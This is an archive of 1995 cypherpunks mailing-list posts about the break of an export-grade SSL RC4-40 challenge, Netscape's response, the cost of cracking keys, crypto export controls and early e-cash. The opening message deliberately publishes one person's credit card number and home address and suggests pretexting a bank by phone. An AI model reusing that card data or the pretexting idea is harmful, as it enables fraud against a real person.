Realistically my internal browser is almost at beta test level and
we will put cipher 01 in our selection of ciphers as well as cipher
2.  We will also make available our browser to link securely to our
servers.

If anyone outside US/CA wants work done to bring their systems
up to 128 bit confidential ciphers please email
jane@jhc.co.uk

(JHC plc - JHC Internet Services - yes it does mean John Hemming & Co)

In the mean time:

My credit card number is 5434 8012 0900 2563 expires 3/97
My name is John A M Hemming
My address is 15, Chantry Road, Moseley, Birmingham B13 8DL

Who loses if you use that:

Firstly, I now have to check my
credit card statements for items that are not mine.  This will be
a pain, but it makes a point clear.

Secondly, if you use it you will be breaking the law.

Thirdly, when the merchant has to refund up to 6 months of trading
turnover on any duff orders the merchant will be seriously upset.

My name and address are a matter of public record in the UK. I have
only made the job easier by putting all of the information in one place.
The card number and expiry date are available in any one of a number
of places.  (As a City Councillor in Birmingham my address has to be
available to the public).

1.  Export SSL is good enough for credit card numbers.
2.  My bank account is protected by export SSL (I mean that you
     need to crack export SSL to look at the balances)
     Alternatively you can phone up the bank and pretend to be
     the police/head office/inland revenue and ask them.
3.  Export SSL or even import SSL is not good enough for entering
     into contracts.  Digital signatures are needed for that.

In the mean time .....

I have managed to implement PGP into my workhorse program (which
is gradually coming up to beta standard).  It seems interoperable with
the PGP.exe file in Europe.  (As long as you keep the message reasonably
short)

This allows two interesting additions

<A HREF="mailto:abc@def.com">

has been extended to

<A HREF="mailto:abc@def.com" PGPKEY="abcddbdb etc">

When you click on that it does a mailto, but also loads the PGP key
(public key and userid packets).  The program saves both the
plaintext and encrypted version and then mails out the encrypted
version.  The PGP key packet has to have the same email address
as that in the mailto otherwise the program will freak.

see

http://mkn.co.uk/

Which uses that.

Similarly

<FORM HREF="mailto:banana@orange.com" PGPKEY="asdfj">

allows the encryption of a form before it is mailed.  I do have a test
form somewhere try the pages in
http://mkn.co.uk/help+dir+test\*.*

This is quite a nice solid way of ensuring high level encryption for
passing around confidential information from forms.  Sadly the
program that does it
ftp://193.119.26.70/mktnet/pub/horse.zip
is still a little flaky.

Once I have finished off getting 128 bit confidential SSL built into
my program I shall be putting in the extensions for electronic cheques
(probably today or tomorrow, but I won't be putting that on release
even as alpha for the moment).

see
http://mkn.co.uk/help/policy/htmlext
for more details.

John
--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjm@ionia.engr.sgi.com (Patrick May)
Date: Thu, 17 Aug 95 10:05:32 PDT
To: cypherpunks@toad.com
Subject: Re: SSL challenge -- broken !
In-Reply-To: <199508161806.LAA29214@mycroft.rand.org>
Message-ID: <199508171705.KAA15070@ionia.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Perry E. Metzger writes:
 > Jim Gillogly writes:
 > > > Hal <hfinney@shell.portal.com> writes:
 > > > I am a little alarmed by the suggestion that this news could
 > > > have some marked impact on the Netscape stock price.  From our
 > > > perspective this was certainly an unsurprising result (not to
 > > > take anything away from Damien
 > > 
 > > So far it appears not to have had an effect.  The two web pages I
 > > know about that track Netscape show it holding steady a point and
 > > a half above where it opened.  Even the IF market on SSLW doesn't
 > > seem to be taking much notice of it, despite my attempts at
 > > manipulating that market.
 > 
 > I haven't seen any news stories about this on the wire
 > services. Someone would have to write a story about it first before
 > people would know...

     Expect to see something in the San Jose Mercury News in the near
future.  I contacted them to pitch the story, hoping to point out as
clearly and frequently as possible that the cracking was possible only
because of ITAR restrictions on key length.  They already have someone
working on it.

Regards,

Patrick May

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Thu, 17 Aug 95 10:11:38 PDT
To: cypherpunks@toad.com
Subject: Idle compute cycles [Re: Netscape's Offical Response]
In-Reply-To: <199508171711.MAA02559@spectrum.bradley.edu>
Message-ID: <199508171711.KAA03255@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



Peter Shank said a lot of things I agree with in his response to Damien
Doligez' break of an SSL/RC4-40 transaction, and one thing that seems to
miss the point.

> From: shank@netscape.com (Peter Shank)
> Subject: Netscape security

> 2. The standard way to determine the level of security of any encryption
> scheme is to compare the cost of breaking it versus the value of the
> information that can be gained. In this case he had to use roughly

Agreed.

> $10,000 worth of computing power (ballpark figure for having access to
> 120 workstations and a few parallel supercomputers for 8 days) to break
> a single message. Assuming the message is protecting something of less
> value than $10,000, then this information can be protected with only
> RC4-40 security. For information of greater value, currently available
> RC4-128 security should be used.

However, the cost of breaking it to Doligez was essentially nil.  The
machines to which he had access were otherwise idle, and no other users
were competing for them.  The virtually simultaneous break by David Byers
in the team led by Adam Back was the same: idle cycles.  In fact, Byers
was delayed because a real project needed cycles on that machine.

I would hazard a guess that 90% of the compute cycles in the world are used
running screen savers... this gives a <lot> of slack for people who would
like to harness them to perform productive work like making points about
the strength of security.

I would have to say the marginal value of compute cycles is approximately
$0 until enough compute hogs come along to eat from the idle cycle trough.

> 3. Inside the US, software can support a range of stronger encryption
> options, including RC4-128, which is 2^88 times harder to break.

Absolutely.  It's incredibly annoying that companies like Netscape who
understand how to get good transaction security have to settle for "almost
good enough" -- the computing cost of the extra security is almost nil.

>                                            We would appreciate your support
> in lobbying the U.S. government to lift the export controls on encryption.
> If you'd like to help us lobby the government send email to
> export@netscape.com.

Yes!

> Finally, we'd like to reiterate that all this person has done is decrypt
> one single RC4-40 message. RC4 the algorithm and products which use the
> algorithm remain as secure as always.

Yes, but with idle cycles contributed by volunteers the decryption time
on a single RC4-40 message can very likely be reduced to a day or so at
no marginal cost to owners of existing machines... which is the whole point.

Cracking weak crypto is free, and can be combatted only by implementing
strong crypto.

	Jim Gillogly
	Highday, 25 Wedmath S.R. 1995, 17:08




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ferreira, Ben  296-4158" <BFERREIR@pchardy.petro-canada.ca>
Date: Thu, 17 Aug 95 09:16:28 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: Over 350 RSA/Perl 'Munitions T-shirts' Shipped
Message-ID: <30337C02@smtpgw.pccw.petro-canada.ca>
MIME-Version: 1.0
Content-Type: text/plain



 ---------- Forwarded message ----------
Date: Tue, 15 Aug 1995 14:17:36 -0600
From: Don Henson <dhenson@itsnet.com>
To: libernet@Dartmouth.EDU
Subject: Over 350 'Munitions T-shirts' Shipped

We have thus far shipped over 350 of the RSA/Perl Munition T-shirts.
Orders are still pouring in. Don't be left out. Order yours today.

Now you can wear a TSHIRT that has been classified as a MUNITION by the
US Government. That's right! The US International Traffic in Arms
Regulations (ITAR) makes exporting cryptographic materials illegal.
ITAR further defines export as providing cryptographic information to a
non-US/Canadian citizen even if you are inside the US at the time.
Providing information is further defined as telling or showing
information to a non-US/Canadian citizen. The Munitions Tshirt has a
Perl implementation of the RSA algorithm (the one used by PGP) printed
on the front along with a bar-code of the same algorithm.

What all the above means is that if you wear the Munitions Tshirt where
a non-US/Canadian citizen can see it, even if it is inside the US, you
have just exported cryptographic material (which is already freely
available outside the US) and have become a criminal in the eyes of the
US Government. Now you too can become an international arms dealer for
the price of a tshirt (US$15.95 - US$19.95, depending on size) and the
guts to wear it.

If you are a non-US/Canadian citizen, you can still own a Munitions
Tshirt by ordering the tshirt from a source that is outside the US. The
email response to a request for info (see next paragraph) includes full
instructions for ordering the tshirt no matter where you live.

For more information on how to own this classic example of civil
disobedience, just send email to dhenson@itsnet.com with the subject of
'SHIRT'. (You don't have to be a US/Canadian citizen to request the
info.) Or, if you have WWW access, just point your Web browser to:

     http://colossus.net/wepinsto/wshome.html

By the way, 25% of the profits from the sale of the tshirt (in the
US/Canada) goes to the PHIL ZIMMERMANN LEGAL DEFENSE FUND to help
defend the author of PGP from harassment and possible prosecution by
the Fedgoons.

And if you get arrested for wearing the Munitions Tshirt, we'll refund
your purchase price.  :-)

Get your Munitions Tshirt now. Who knows how long they'll stay in
production!

Don Henson, Managing Director (PGP Key ID = 0X03002DC9)
West El Paso Information Network (WEPIN)
Check out The WEPIN Store at URL:
http://colossus.net/wepinsto/wshome.html


 --

 ------------------------------------------------------
|        A L B E R T A   Advanced Computing            |
|      R E S E A R C H   & Engineering Dept.           |
|        C O U N C I L                                 |
|                                                      |
|      Mailing Address   J u l i a n   B r o m w i c h |
|            3rd Floor   Junior Research Officer       |
| 6815 - 8th Street NE   bromwich@skyler.arc.ab.ca     |
|     Calgary, Alberta                                 |
|       Canada T2E 7H7                                 |
 ------------------------------------------------------

 ------------------------------------------------------
|     R A D S S                                        |
|         Technologies                                 |
|                                                      |
|      Mailing Address   J u l i a n   B r o m w i c h |
|         Alberta Pool   Software Specialist           |
|             Box 2700   JBromwich@awp.com             |
| 505 Second Street SW                                 |
|     Calgary, Alberta   Ph:  (403) 290-5491           |
|       Canada T2P 2P5   Fax: (403) 290-5550           |
 ------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 17 Aug 95 07:54:43 PDT
To: cypherpunks@toad.com
Subject: Predicament Again
Message-ID: <199508171416.KAA12135@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Just because I love beating a dead horse...

Back in June we had the argument over whether or not Phil Z should be
worried because of the threat of prosecution hanging over him.  And a
prosecutor (?) by the name of Brian Davis as well as Tim and others thought
that I was wrong to say that I would enjoy the process because of the
opportunities for verbal abuse and point scoring that I would have were I
under threat of prosecution in a case the government couldn't win.  (Mostly
pure 1st Amendment cases.)

The reason that this is important is a big fat tactical fact.  Defeat is a
process that takes place in the mind of the enemy.  It is well known to
military types that it is possible for the weaker force to overcome the
stronger force if the stronger force can be convinced that it has lost.
People are rapidly becoming the stronger force in conflicts with governments
because of technology, but governments are trying to use intimidation where
they lack the capabilities.  They are trying to psych us (and particularly
the more credulous) out.

We can fight this weapon by constant hammering at the fact of the
government's weakness and its failure to intimidate us.

Since most of what we do on the nets is speech and since speech enjoys a
great deal of protection in the US, it is important to hit the opposition
hard in speech cases where we have a strong hand.  I certainly don't
advocate abuse of prosecutors in other cases (taxes and drugs) where
conviction is likely.  But in pure speech cases, we should really heap on
the derision.  I happen to think that the prosecution of the award-winning
Phil Zimmermann is one of those kinds of cases.

Another similar case surfaced in Connecticut.  The "Greenwich 5" had
conspired so that nonsense syllables in their high school yearbook photo
captions spelled out "Kill all the [African Americans]."  (Note the
cypherpunk significance of code use.)  There was a bit of controversy of
course and the young scholars volunteered to attend a "Civil Rights Boot
Camp" run by the now neo-conservative CORE.  Some weeks later, local and
state prosecutors announced that they would not prosecute the 5 under CT's
civil rights laws because of "lack of evidence."  Calls to The Butcher of
Waco for federal prosecution followed but have as yet had no results.

This is the sort of case in which I would advocate that the "object of
prosecutorial interest" be as aggressive and abusive as possible.  The
reason the prosecutors declined to prosecute was not lack of evidence but
lack of law violation.  The prosecutors were too cowardly to state that the
Greenwich 5's action was perfectly legal.  Since the public servants won't,
it is up to those who are attacked to do so.

The benefits of cutting through the exon in a case like this are that
prosecutors are less likely to proceed in similar cases in the future and
the public is educated as to the true state of the law.  It is recreational
as well.

DCF

"Few generals have ever been defeated because they had too many soldiers
under their command."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Thu, 17 Aug 95 14:51:28 PDT
To: Damien Doligez <Damien.Doligez@inria.fr>
Subject: Re: SSL challenge -- broken !
In-Reply-To: <9508160842.AA27120@couchey.inria.fr>
Message-ID: <Pine.3.89.9508171031.E16021-0100000@www2.software.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 16 Aug 1995, Damien Doligez wrote:

> SSL challenge -- broken
> 
> Conclusions:
> 
> * Many people have access to the amount of computing power that I used.
>   The exportable SSL protocol is supposed to be weak enough to be
>   easily broken by governments, yet strong enough to resist the attempts
>   of amateurs.

Exactly

>               It fails on the second count.  Don't trust your credit
>   card number to this protocol.

Huh?  So you run on 120 workstations worth how much?  to steal a credit
card number worth how much?  Get real - there are hundreds of ways
to get credit card numbers that cost less.  The idea is to make
breaking SSL less attractive than dumpster diving not to make it
impossible.   I'll lay odds that I could get the credit card number
of *any* individual in the US in less elapsed time and with nothing
more than a $1000 windoze machine, a telephone and a modem.


John Pettitt
jpp@software.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goedel@tezcat.com (Dietrich J. Kappe)
Date: Thu, 17 Aug 95 08:27:00 PDT
To: cypherpunks@toad.com
Subject: Re: SSL challenge -- broken !
Message-ID: <v01510100ac591cbb4e10@[204.248.80.18]>
MIME-Version: 1.0
Content-Type: text/plain


>At 04:39 PM 8/16/95 -0500, you wrote:
>>> I haven't seen any news stories about this on the wire
>>> services. Someone would have to write a story about it first before
>>> people would know...
>>
>>I've suggested this to a few reporters I know..
>
>It's worth suggesting this _carefully_ so the spin's right.
>For instance "Oh, no, Netscape lets Hackers suck all the money
>out of your credit cards" would be bad :-)  On the other hand,
>"The US Government's Evil Plans to block encryption are limiting
>Netscape's export products to an encryption system already broken
>by a French university.  This means you can send credit card numbers
>safely to American web sites, but not to foreign ones - like the
>airline or hotel reservations you were making for your vacation,
>or those Irish handcrafts or bottle of Scotch you were ordering,
>or that Hong Kong magazine you were subscribing to, or the CD from
>that band in Budapest that had the great sound samples out there.
>And when you were donating to that Amazon rainforest conservation
>group, the NSA's arbitrary export rules may have just helped the
>Colombian drug cartels rip off your credit card."

That's pretty much the spin on page B3 of the WSJ. I'll type it in when I
get the chance.


Dietrich J. Kappe | Red Planet    http://www.redweb.com/
Red Planet, L.L.C.|         "Chess Space"              /chess
1-800-RED 0 WEB   |      "MS Access Products"          /cobre
Web Publishing    | E-mail:  RedPlanet@redweb.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 17 Aug 95 11:32:44 PDT
To: "Rev. Mark Grant" <cypherpunks@toad.com
Subject: Cost to Crack Keys
Message-ID: <ac58d999110210044b77@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:45 PM 8/17/95, Rev. Mark Grant wrote:
>>      In this case he had to use roughly
>>      $10,000 worth of computing power (ballpark figure for having access to
>>      120 workstations and a few parallel supercomputers for 8 days) to break
>>      a single message.
>
>Hmm, I don't know about anyone else around here, but my workstation is
>idle 99% of the time. I could almost certainly get access to all the spare
>CPU cycles on 120 workstations for free, and I suspect that a lot of
>people (particularly hackers) could do so as well. There's no need to
>spend $ 10,000 on renting them.

But, Mark, estimates of the cost to crack a key _must_ be based on market
prices, not on opportunistic access to machines. Such access is good for
occasional, or one-shot, deals, but not for routine use.

For example, one doesn't say "Hey, I don't see how Hertz can charge $40 a
day to rent a car...my friend lets me use his for free."

The technical issues of whether there are faster ways to break the keys, or
how fast and far MIPS prices will drop, is a separate issue.

"Standard accounting practices" dictate the way to estimate production costs.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 17 Aug 95 08:45:59 PDT
To: cypherpunks@toad.com
Subject: RUB_han
Message-ID: <199508171545.LAA10941@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Hurray for PRZ and D.FR and the yet-untargeted DCF 
unconspiratorily, merrily, incites. 


Now, sordid lucre biz:


   8-17-95. NYPaper:


   "A mystery bankers love: How do credit cards stay so
   profitable?"

      The profit on credit card operations is almost five
      times the overall profit rate in banking. Last year,
      eight of the top nine commercial banks ranked by return
      on assets specialized in credit card loans. In a free
      market, this isn't supposed to happen. If the business
      is immensely profitable -- and that profitability is no
      secret -- why hasn't wideopen competition forced banks,
      at best, to offer lower interest rates to consumers or,
      at worst, at least to dissipate their excess profits in
      ever greater spending for promotion? This is not a
      pretty picture of free markets at work.


   "Mastercard Joins Banks to Plan Card That Works Like Cash."
   [This amplifies a bit the anonymous post on SmartCash.]

      The venture, called Smartcash, plans to issue what are
      called "stored value" or "electronic purse" cards.
      Customers would be able to load money onto these cards,
      say $20 or $50, at automated teller machines or by
      calling their banks with specially equipped telephones.

       "We're in a state of chaos," said Stephan Seidman, the
      editor of Smart Card Monthly, a trade publication. "A
      year ago banks said there was no good reason to issue
      smart cards. Now they are in a headlong plunge to get
      something out fast." The result, he said, is shifting
      and competing alliances that may lead to incompatible
      systems and confusion for consumers.


   Deux: RUB_han (about 10kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 17 Aug 95 12:04:05 PDT
To: cypherpunks@toad.com
Subject: The Official Cypherpunks Screen Saver?
Message-ID: <ac58dab7120210048eb3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:11 PM 8/17/95, Jim Gillogly wrote:

>I would hazard a guess that 90% of the compute cycles in the world are used
>running screen savers... this gives a <lot> of slack for people who would
>like to harness them to perform productive work like making points about
>the strength of security.

It would really be cool to have a screen saver that did useful work while
displaying pretty pictures.

Imagine a screen saver, maybe with code modules running in "After Dark,"
that updates the screen with keys tried...could be a nice demonstration of
bignums in crypto, etc. Every now and then the user would get lucky and
alarms would go off...

(Details: getting the modules to automatically divvy-up keyspace...or maybe
just let user pick his own key, or from a list, or whatever. A la the
"Chinese lottery" keycracking scheme, where set-top cable boxes (containing
computers) crunch on keys and try to match to signals sent over the
air...Schneier may have something on this in his book.)

Just a thought. The "Official Cypherpunks Screen Saver"? I'd rather have
this running on my Mac than have a t-shirt.

--Tim May

(Berkeley Systems, makers of "After Dark" for Macs and Windows, supports
third-party modules. Maybe the "Flying Toasters" could swoop down, pick up
a "key" laying on the "ground" and proceed to munch on it...the mind
boggles.)

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.cudenver.edu (Alan Westrope)
Date: Thu, 17 Aug 95 10:58:01 PDT
To: cypherpunks@toad.com
Subject: Denver area meeting, SUNDAY, 8/20, 2 pm
Message-ID: <rB4MwkkAsqCF084yn@ouray.cudenver.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

This one is on SUNDAY, 2 pm, at the Tivoli Food Court (at least
initially).  Send email for directions, etc.


Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Exon blows goats...but I suspect you already knew that.

iQCVAwUBMDOBpVRRFMq4NZY5AQEnVAP8CLg9z5AwjIw0ouJtxPPr6CUytFOeVPrt
cMrEm8MRUt0ay0S4F+TGMq1npcF8pxdU0jwWk9EBj+1XvTOKVpEED+kp8shafsVj
qlWGplAVUHMTF19H1VAByoz7j3VGMB2zmdNDm2ifDMNzR5Di81o7CeyvQT0sZ6zt
5XGWmHkoX3g=
=GD3W
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 17 Aug 95 11:52:45 PDT
To: "Marcel van der Peijl" <mark@unicorn.com
Subject: Re: First known purchase of physical goods with cyberbucks
Message-ID: <ac58dd4d130210042a42@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:39 PM 8/17/95, Marcel van der Peijl wrote:
>> Anyway, if anyone knows of an earlier transaction of cyberbucks for physical
>> goods than this (at 15:00 GMT 17th August 1995), then please let me know.
>
>As far as I know, the first transaction took place when I (while
>testing) bought a postcard from GlobalX, the first ecash store to
>open besides our own (and mine). It is stored in the 'DigiCash
>museum' next to early prototypes of all kinds of smartcards,
>emulators, wallets etc.
>
>This must have been around October last year (or August? Can't make
>out the postmark). Hundreds of cards were shipped by several shops,
>and stickers, lotteries, etc. Check the 'physical objects' section
>on http://www.digicash.com/shops/categorical.html
>
>Maybe you should restrict the 'first known' claim to 'first known
>purchase of physical goods with cyberbucks traded at the ECM'.
>
>Sorry!

Also, there are other potential claims for this sort of thing. Based on
varying extents to which the "electronic money" is really secure, is
cryptographically interesting, etc.

For example, more than two years ago on this list (I think it was spring of
'93, but it could've been spring of '94) there was a flurry of
transactions involving the "MagicMoney" and "TackyTokens" of Pr0ductCypher
and others. I recall Black Unicorn and others talking about transactional
exchanges involving sixpacks of beer or soft drinks. I could check my
archives, but you get the point.

And before that, there were "HExmarks" being used on the Extropians list.
There was a nominal conversion rate to real dollars, and at the time I left
that list, I had more HExmarks than anyone else.

And dozens of token-based systems, coupons, LETS systems, etc. Not to
mention the various commercial smartcards and "e money" systems.

Granted, most of these are not "Chaumian," which is what most of us think
of as digital cash.

Claiming credit for being first is a tough issue.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@flame.alias.net (Anonymous)
Date: Thu, 17 Aug 95 03:02:33 PDT
To: cypherpunks@toad.com
Subject: Out of state gambling
Message-ID: <199508171002.MAA01952@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Hello C-Punks:

(nb This is posted anonymously because I had this idea the implementation
of which would be (probably) illegal.  I'm not sure whether putting my 
name to the idea would be a good idea for the reason that I can't be
sure that I wouldn't be implicated under the overbroad "conspiracy" or
"Rico" powers which are oh so popular as a way of putting people away
for thought crimes.  This message will in any case have appeared via
a couple of foreign remailers on its way. I am proud of the idea, but
I appreciate those of you who know who I am keeping quiet about it, as
I'm just being prudent, and extra cautious.

The idea.....Out of state gambling, Internet style - let's give them a
taste of what's to come.

You may recall that a short time before Pres. Clinton got elected, the
Wall Street Journal had an article about gambling taking place in Moscow
and London on the outcome of the election.  The story told by the article
was that the bookmakers in London had more up to date and better info.
than Gallup and Roper obtained with all their phone polls.  
The London bookie's accuracy was vindicated by the outcome, as Clinton
won, and by the predicted margin.

Ahhh...The power of the free market. Makes sense too, if it's your own
money on the line rather than someone else's phone call (during a meal,
of course) I wonder how many US bets were placed in England (covertly,
via friends etc.).  The internet casino, which will soon be open for
business - <http://www.casino.org> - adds a new Internet related twist
to this.  Could someone, perhaps a furriner, perhaps talk to the folks
at casino.org and see if they would be willing to open a book on
presidential election outcomes.  Or perhaps organize something with
an enterprising London/Moscow gambling house, preferably with fast
IP feed, and constantly updated odds on the web.

The Internet Casino is advertising that they will be having their 
"Grand Opening" on August 18.

My aim is to make cheap, timely & accurate poll predictions, not
to encourage contravention of the gambling laws, which are, after all,
oh so important to protecting life as we know it. If some people 
choose to avoid these laws I disclaim all responsibility, but the anon.
remailer is insurance that all of you will feel the same way.

The aim in writing this short missive to cpunks is to encourage
someone who is more able legally to help this idea happen.

Just attempting to add some substance to Tim's sig. quote, about
national borders being merely "speed bumps", my ideal implementation
would see lots of e$ bets, cpunk-remailers, and (for US citizens) strong
encryption.

Any suggestions for books?
I've got a few (besides the obvious, "Who Wins"?) such as:
Which Republican will win the nomination?
Will "Speaker Newt" run.
Will "Moneybag$" enter the race?
If so, will he drop out and enter again?

Any comments on the practical and legal issues (such as exactly what
laws I'm violating) or on getting publicity for such a scheme? This
might be easier than we think, as the media [at least the WSJ] is well
aware of the bookie's superior accuracy & lower cost.

Thank you.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Glenn Powers <gpowers@spectrum.bradley.edu>
Date: Thu, 17 Aug 95 09:08:30 PDT
To: cypherpunks@toad.com
Subject: Netsacpe's Offical Response
Message-ID: <199508171711.MAA02559@spectrum.bradley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Originally From shank@netscape.com  Thu Aug 17 11:42:39 1995
X-Sender: shank@pop.mcom.com
Message-Id: <v02110107ac5914142373@[198.93.94.118]>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Thu, 17 Aug 1995 08:44:45 -0700
X-PH: V4.1@bradley
To: gpowers@bradley.edu
From: shank@netscape.com (Peter Shank)
Subject: Netscape security

Glen,

We're sending this response to the press and interested parties; it may also get posted on home.netscape.com.

Best regards...

-Peter

Late Tuesday evening a person from France posted a news article to the
hacker community claiming success at decrypting a single encrypted message
that had been posted as a challenge on the Internet sometime on or before
July 14, 1994. His response to the challenge is described in an email that
has been forwarded widely across the Internet.

What this person did is decrypt one encrypted message that used RC4-40 for
encryption. He used 120 workstations and two parallel supercomputers for 8
days to do so. As many have documented, a single RC4-40 encrypted message
takes 64 MIPS-years of processing power to break, and this roughly
corresponds to the amount of computing power that was used to decrypt the
message.

Important points to understand:

  1. He broke a single encrypted message. For him to break another message
     (even from the same client to the same server seconds later) would
     require *another* 8 days of 120 workstations and a few parallel
     supercomputers. The work that goes into breaking a single message can't
     be leveraged against other messages encrypted with other encryption
     keys.

  2. The standard way to determine the level of security of any encryption
     scheme is to compare the cost of breaking it versus the value of the
     information that can be gained. In this case he had to use roughly
     $10,000 worth of computing power (ballpark figure for having access to
     120 workstations and a few parallel supercomputers for 8 days) to break
     a single message. Assuming the message is protecting something of less
     value than $10,000, then this information can be protected with only
     RC4-40 security. For information of greater value, currently available
     RC4-128 security should be used.

  3. Inside the US, software can support a range of stronger encryption
     options, including RC4-128, which is 2^88 times harder to break.
     Meaning that the compute power required to decrypt such a message would
     be more than 1,000,000,000,000 (trillion) times greater than that which
     was used to decrypt the RC4-40 message. This means that with foreseeable
     computer technology this is practically impossible.

So in conclusion, we think RC4-40 is strong enough to protect consumer-level
credit-card transactions -- since the cost of breaking the message is
sufficiently high to make it not worth the computer time required to do so
-- and that our customers should use higher levels of security, particularly
RC4-128, whenever possible. This level of security has been available in the
U.S. versions of our products since last April. Because of export controls
it has not been available outside the U.S. We would appreciate your support
in lobbying the U.S. government to lift the export controls on encryption.
If you'd like to help us lobby the government send email to
export@netscape.com.

Finally, we'd like to reiterate that all this person has done is decrypt
one single RC4-40 message. RC4 the algorithm and products which use the
algorithm remain as secure as always.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jason Weisberger <jweis@primenet.com>
Date: Thu, 17 Aug 95 12:19:37 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Cost to Crack Keys
In-Reply-To: <ac58d999110210044b77@[205.199.118.202]>
Message-ID: <199508171919.MAA19041@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text


> 
> But, Mark, estimates of the cost to crack a key _must_ be based on market
> prices, not on opportunistic access to machines. Such access is good for
> occasional, or one-shot, deals, but not for routine use.
> 

Is it opportunistic access of machines, Tim, or simple use of available machines? I don't 
think this kind of access is limited to one shot deals.  I've seen enough environments where 
the cpu cycles to achieve these kinds of tasks (brute forcing keys) are available and  no one 
is much going to care if it is done in a low-profile manner.

> For example, one doesn't say "Hey, I don't see how Hertz can charge $40 a
> day to rent a car...my friend lets me use his for free."
> 

Indeed - but what is the real market value of the cpu cycles needed to pull off the task at 
hand? I think it's far less than $10,000.00

> 
> "Standard accounting practices" dictate the way to estimate production costs.
> 

That's like accepting the amortized value of an object as its real value. I don't think GAAP 
really comes into play here...



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 17 Aug 95 12:24:49 PDT
To: cypherpunks@toad.com
Subject: Re:  Breaking DES anyone? (was: Breaking RC4-40 for less)
Message-ID: <199508171923.MAA17947@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: aba@dcs.exeter.ac.uk
> Another approach is to do lots of keys simultaneously - so you set up
> this distributed effort which is continually re-sweeping the 40 bit
> keyspace, say every couple of days or whatever.  You can sweep for
> more than one key at once at very low incremental cost, an extra key
> costs close to nothing.  So say you are searching for 1000 keys at
> once - a dragnet approach - well keys just pop out at random as they
> are hit, maybe straight away maybe at worst case the sweeping
> roll-over time, but on average a key will fall out every 3 minutes.

I don't see how you can sweep for more than one key at once at low cost.
Because of the salt, every possible SSL encrypted message has to be swept
independently.  You can't sweep for two messages' keys at once because the
input to the MD5 is different even for the same 40-bit key.

If digital cash in micro amounts became practical, people could be paid
to let the "idle cycles" on their computers be used for this kind of
highly parallel application.  (Some people have speculated that graphics
rendering would be another suitable choice.)  It would be interesting to
see what the market price of cycles became in such an environment.  That
would give a better benchmark for the cost to break keys.

Hal
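
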